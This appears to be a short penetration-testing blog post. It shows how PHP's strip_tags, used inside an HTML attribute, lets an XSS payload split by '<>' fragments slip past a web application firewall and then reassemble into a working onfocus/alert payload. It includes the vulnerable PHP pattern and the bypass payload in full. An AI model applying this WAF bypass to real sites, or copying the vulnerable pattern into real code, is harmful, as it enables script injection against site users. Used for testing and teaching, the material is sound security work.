Abusing PHP strip tags to bypass modern WAF to exploit XSS
Fri Oct 04, 2019 · 2 min read

Black box exploitation is always hard. PHP offers many options to help you prevent XSS attacks. Here are a few:


It may be hard to distinguish which of these functions are used in the application you are testing. There might also be a combination of these used to prevent XSS attacks.

How to detect strip_tags through black box testing?

  1. Everything between < and > is removed.
  2. A special case is when only the opening tag < exist but not the closing >. In this case, everything after the < will be truncated.

Example of characteristics:

  1. strip_tags("foo<bar>") => "foobar"
  2. strip_tags("foo<bar.....") => "foo"
  3. strip_tags("foobar>") => "foobar>"

How to abuse strip_tags

Let’s say you find a parameter that is vulnerable to XSS.

    <input class="input" data-id="{XSS}" value="test" />

You try a simple alert payload

    <input class="input" data-id="" autofocus onfocus=alert(1) value="test" />

Result: Error 500: Blocked by WAF…

Finding a WAF bypass can often be tiresome and require very creative payloads.

Let´s say the PHP code looks something like this

    <input class="input" data-id="<?=strip_tags($_GET['id-test']);?>" value="test" />

Sometimes we can abuse strip_tags if it’s used in the wrong context, like in this case.

Since we are in the attribute context, we do not need to open any tags (<..>) for our payload to work. Looking at our payload " autofocus onfocus=alert(1) that was blocked by the WAF.

What happens if we apply <> to our payload:

    /?id-test="<> au<>tof<>ocus o<>nfo<>cus=<>al<>ert<>(1<>)
  1. The WAF will allow this payload as it’s just gibberish.
  2. PHP see our payload and apply strip_tags to our string and remove all <>.
  3. Our payload will trigger the XSS:
    <input class="input" data-id="" autofocus onfocus=alert(1) value="test" />


If strip_tags is used in the wrong web context, we can abuse this by adding <> to our payload which will trick the WAF into thinking this payload is allowed. When PHP later processes our payload it will remove all the <> and thus revealing our battle-ready XSS payload.

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